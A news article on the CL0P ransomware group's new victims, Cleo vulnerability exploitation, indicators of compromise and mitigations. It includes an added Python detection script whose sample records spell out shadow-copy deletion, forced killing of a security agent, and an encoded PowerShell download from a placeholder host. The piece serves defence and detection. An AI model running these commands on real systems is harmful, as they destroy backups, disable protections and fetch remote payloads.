CL0P Ransomware Expands Global Assault, Adding New Victims to Its List

The CL0P ransomware group, one of the most prolific cybercrime syndicates operating under the Ransomware-as-a-Service (RaaS) model, has expanded its attack footprint by listing three new victims on its dark web leak site: United Legwear & Apparel Co. (U.S.), Thermotraffic GmbH (Germany), and PHONONET GMBH (Germany).

This development comes amid heightened scrutiny of the group’s exploitation of critical vulnerabilities in enterprise software, including the recent Cleo platform vulnerabilities (CVE-2024-55956 and CVE-2024-50623).

Since resuming operations in late 2024, CL0P has compromised 66 organizations globally through its double extortion campaigns, threatening to leak sensitive data unless ransoms are paid.

Origins and Evolution of the CL0P Threat

Emerging in 2019 as a successor to the CryptoMix ransomware family, CL0P operates under the financially motivated TA505 cybercrime collective, with strong ties to Russian-speaking affiliates like FIN11.

The group’s name derives from the Russian word “klop” (bed bug), reflecting its stealthy infiltration tactics.

CL0P gained notoriety for its big game hunting strategy, targeting enterprises with annual revenues exceeding $5 million, particularly in sectors like healthcare, finance, logistics, and government.

By 2023, the U.S. Department of Justice attributed over $500 million in losses to CL0P-linked attacks, including high-profile breaches at British Airways, the BBC, and UCLA.

The ransomware’s technical sophistication lies in its multi-stage attack chain: initial access via phishing or software exploits, lateral movement through SMB protocol vulnerabilities, privilege escalation via domain controller compromise, and deployment of customized encryption payloads.

Recent campaigns have leveraged zero-day exploits in file transfer platforms like Accellion FTA, MOVEit, and Cleo’s VLTrader, enabling mass data exfiltration before encryption.

The Cleo Vulnerability Exploitation Campaign

CL0P’s 2024–2025 campaign hinges on exploiting CVE-2024-55956, a critical flaw in Cleo’s integration software that allows unauthenticated remote code execution via manipulated API requests.

This vulnerability, paired with CVE-2024-50623 (CVSS 9.8), has enabled the group to infiltrate over 1.6 million exposed assets globally, according to CYFIRMA’s telemetry.

Unlike earlier campaigns, CL0P has increasingly focused on data exfiltration without encryption, relying on the threat of leaks to pressure victims.

This shift mirrors tactics observed in the MOVEit attacks of 2023, which impacted 3,000 U.S. organizations and 8,000 worldwide.

The group’s latest Indicators of Compromise (IoCs) include attacker IPs like 185.181.230.103 (scanning host) and 176.123.5.126 (embedded in encoded PowerShell scripts), alongside C2 servers such as 185.162.128.133.

These IoCs underscore CL0P’s reliance on obfuscated scripting and legitimate administrative tools like vssadmin.exe to disable backups and taskkill.exe to terminate security processes.

New Victims and Geopolitical Targeting Trends

The addition of United Legwear & Apparel Co., a major U.S. clothing distributor, and German logistics firms Thermotraffic and PHONONET GMBH highlights CL0P’s focus on supply chain disruption.

These targets align with the group’s historical preference for industries reliant on just-in-time manufacturing and sensitive customer data.

Geopolitically, CL0P continues to avoid CIS nations while concentrating 58% of attacks on U.S. entities, followed by Germany (12%) and the UK (9%).

Notably, CL0P’s double extortion model has evolved to include direct negotiations via Tor-based chat portals and deadlines as short as 48 hours for ransom payments.

Failure to comply results in incremental data leaks, as seen in the MOVEit campaign, where 515 victims were publicly shamed within weeks.

Mitigation Strategies and Industry Response

To counter CL0P’s advanced tactics, cybersecurity agencies recommend:

  1. Immediate patching of Cleo, MOVEit, and Accellion FTA systems, prioritizing CVE-2024-55956 and CVE-2024-50623.
  2. Network segmentation to limit lateral movement, coupled with strict monitoring of SMB and RDP traffic.
  3. Behavioral analytics to detect anomalies in PowerShell usage or unauthorized VSS modifications.
  4. Dark web monitoring to identify early signs of data leakage, as CL0P frequently previews stolen data before full disclosure.
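Points 2 and 3 above, together with the vssadmin.exe, taskkill.exe and encoded-PowerShell behaviours noted earlier, translate naturally into process-creation rules. The following is an added example (not from the article or any vendor): it runs three such rules over constructed Sysmon/4688-style records, decodes a `-EncodedCommand` argument (base64 of UTF-16LE) and pulls IP literals out of the result. Host names, the placeholder process names `edr-agent.exe`/`av-service.exe` and the documentation address 192.0.2.10 are all made up.

```python
import base64
import re


def _enc(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 style fields).
# These are fabricated for the example; they are not real telemetry or the article's IoCs.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws01", "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill.exe /F /IM edr-agent.exe"},   # edr-agent.exe is a placeholder name
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("Invoke-WebRequest http://192.0.2.10/a.txt")},
    {"host": "ws03", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},           # benign: lists, does not delete
]

# Hypothetical names of security agents whose forced termination should raise an alert.
PROTECTED_PROCESSES = {"edr-agent.exe", "av-service.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match the common ones.
_ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if absent/undecodable."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_events(events):
    """Apply the three behavioural rules; one finding dict per matching record."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd, low = ev["cmdline"], ev["cmdline"].lower()
        if image == "vssadmin.exe" and "delete" in low and "shadows" in low:
            findings.append({"host": ev["host"], "rule": "shadow_copy_deletion", "detail": cmd})
        elif image == "taskkill.exe":
            targets = set(re.findall(r"/im\s+(\S+)", low))
            if targets & PROTECTED_PROCESSES:
                findings.append({"host": ev["host"], "rule": "security_process_kill", "detail": cmd})
        elif image in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(cmd)
            if decoded is not None:   # decoded script is what an analyst needs to read
                findings.append({"host": ev["host"], "rule": "encoded_powershell",
                                 "detail": decoded, "ips": _IPV4.findall(decoded)})
    return findings
```

Such rules are a starting point: routine backup jobs also call vssadmin, so the shadow-copy rule should be tuned to the accounts and hosts that legitimately do so.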

The U.S. government’s $10 million bounty for CL0P operatives, announced in July 2023, remains active, reflecting ongoing law enforcement efforts to dismantle the group.

However, with CL0P’s infrastructure resilient to takedowns and its affiliates increasingly decentralized, organizations must prioritize proactive defense measures to mitigate this persistent threat.

As ransomware tactics grow more insidious, the CL0P syndicate epitomizes the convergence of cybercrime and geopolitical posturing, leveraging vulnerabilities in global digital infrastructure to exact unprecedented financial tolls.

The latest victims serve as a stark reminder: no industry or nation is immune to this evolving crisis.
